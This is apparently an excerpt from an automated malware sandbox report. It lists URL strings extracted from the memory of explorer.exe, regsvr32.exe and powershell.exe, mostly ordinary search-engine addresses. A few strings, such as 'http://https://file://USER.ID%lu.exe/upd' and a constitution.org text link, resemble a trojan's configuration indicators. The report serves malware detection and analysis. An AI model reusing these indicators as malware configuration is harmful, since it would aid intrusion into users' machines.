Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: de-ch[1].htm.5.dr String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr String found in binary or memory: http://ogp.me/ns/fb#
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001A.00000002.999208445.000001E7AABF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.957734718.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.4.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
